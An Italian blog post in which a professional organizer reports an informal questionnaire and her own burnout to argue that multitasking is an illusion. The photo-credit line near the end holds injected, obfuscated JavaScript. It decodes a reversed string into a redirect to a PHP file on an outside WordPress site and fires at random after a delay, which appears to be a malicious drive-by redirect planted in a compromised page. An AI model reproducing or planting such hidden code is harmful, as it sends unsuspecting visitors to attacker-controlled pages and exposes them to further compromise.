fbpx

Multitasking si o no?

06/05/2016, by LORENZA, in Blog, 1 comment

Qualche tempo fa ho fatto compilare un questionario alle mie più care amiche e a diverse conoscenti che rappresentavano in pieno il mio target. L’ho fatto per capire di cosa può aver bisogno il mio cliente, quali sono le sue criticità, in cosa potrei essergli di aiuto.

 

Il questionario era composto da diverse domande, tutte riferite ai miei ambiti di intervento. Da “il tuo armadio è in ordine?” a “il piano di lavoro in cucina è occupato?” o anche domande riferite allo stile di vita, tipo “ti concedi il tempo per oziare?” o “riesci a dire no a qualche impegno?”. Ho fatto anche domande sul lavoro e ho chiesto “ti senti stressato? se si, quale può essere il motivo?”

 

Alla domanda ” se dovessi servirti di un professional organizer, per cosa lo chiameresti?”

  • Il 90% delle persone ha risposto: PER LA MIA CASA oppure PER RIORGANIZZARE IL MIO ARMADIO.
  • il restante 10% ha risposto: PER GESTIRE IL MIO TEMPO LIBERO

 

Alla domanda “pensi di essere una persona multitasking?”

  • Il 98% delle persone ha risposto: SI , argomentando anche la risposta con: SONO DONNA

Alla domanda “sei in grado di fare più cose nello stesso momento?”

  • Il 98% delle persone ha risposto: SI

Alla domanda “ti senti stressato? e quale può essere il motivo del tuo stress?”

  • Il 98% delle persone ha risposto: SI ed il motivo è IL LAVORO

 

Questi dati sono molto interessanti e mi hanno fatto decidere di fare una serie di post che possano aiutarti a migliorare la percezione che hai della tua casa e della gestione della tua quotidianità e del tuo tempo libero.

 

Oggi ti parlo del MULTITASKING

“svolgere diverse funzioni contemporaneamente, fare diverse cose allo stesso tempo” (Fonte: Diz. Garzanti)

Purtroppo devo comunicarti che, no, non sei Multitasking a meno che tu non faccia parte di quel 2% della popolazione che riesce effettivamente a fare più cose insieme. Ora tu dirai: io ne faccio parte! Ti spiego perché invece potrebbe non essere vero, raccontandoti la mia esperienza.

 

Dopo quasi 22 anni ho detto basta ad un lavoro che mi ha logorata e mi ha tolto tutte le energie possibili causandomi uno stress enorme che si è presentato sotto varie forme, dall’ansia alla cervicale perenne, dalle vertigini ai dolori in tutto il corpo, per non parlare dei cattivi rapporti con colleghi e conflitti nella mia vita privata.

 

Sono sempre stata convinta di essere una donna Multitasking, convinta di fare più lavori contemporaneamente, forte anche del fatto che ero molto organizzata (ho capito dopo che è stato per quel motivo che sono riuscita a resistere per così tanto tempo). 6 anni fa ho alzato comunque bandiera bianca. Avevo esaurito tutte le mie energie mentali, non potevo più andare avanti. Chiesi aiuto ai miei Responsabili e Dirigenti ma nessuno si fece vivo, ci fu un totale disinteresse se non le solite pacche sulle spalle e le solite frasi: lei è una persona forte, coraggio che ce la fa.

 

Illuminante per me è stato partecipare al Corso di Formazione per diventare P.O. Studiando il Multitasking ho capito che mi ero illusa per anni! Finalmente avevo avuto le risposte ai miei malesseri, al perché fossi sempre stressata e stanca.

 

Coloro che si sono vantati delle meraviglie del Multitasking hanno sbagliato alla grande, me compresa. Dopo anni di ricerche è stato appurato che quando le persone pensano di fare multitasking, in realtà stanno solo passando da un compito a un altro molto rapidamente . E ogni volta che lo fanno, c’è un costo cognitivo.

 

Convinta come un pompiere che stavo facendo un sacco di cose insieme, ahimè, il multitasking mi ha resa:

  • meno efficiente
  • annebbiata
  • il mio quoziente intellettivo è calato paurosamente (aiutoooooo)
  • è calata anche la mia capacità di attenzione
  • difficoltà a prendere decisioni lucidamente

……direi che può bastare!!

 

Earl Miller del Massachusetts Institute of Technology aggiunge «La gente non può fare multitasking molto bene, e quando dice che possono, stanno illudendo se stessi. E si scopre che il cervello è molto bravo in questo business dell’illusione» .

 

Sei ancora convinta di essere Multitasking? Se si, mettiti alla prova nella tua giornata lavorativa. Osserva bene ciò che fai. Io l’ho fatto per 6 mesi, tutta la durata del corso, per capire davvero se saltavo da un lavoro ad un altro continuamente, con conseguenze catastrofiche, o se ne facevo due/tre insieme, ma proprio insieme!

 

Niente da fare, non faccio parte di quel 2% che ci riesce. Nonostante la mia capacità di essere organizzata, è il cervello che non me lo permette, perché riesce a fare una sola cosa alla volta.

 

Soluzioni?  Fare un solo lavoro alla volta, cercando di rimanere focalizzati su ciò che si sta facendo, cercando di essere rilassati ed imparando a gestire le interruzioni. Non è facile ma se dal risultato del mio questionario il 98% delle persone si sente stressato per colpa del lavoro, un motivo ci sarà, quindi il mio consiglio è: prova a darti una occasione per stare meglio. 

 

Lorenza

 

Photo by $NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tos/work?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText”>Unsplash


1 Comment found

Join the discussion and share your opinion.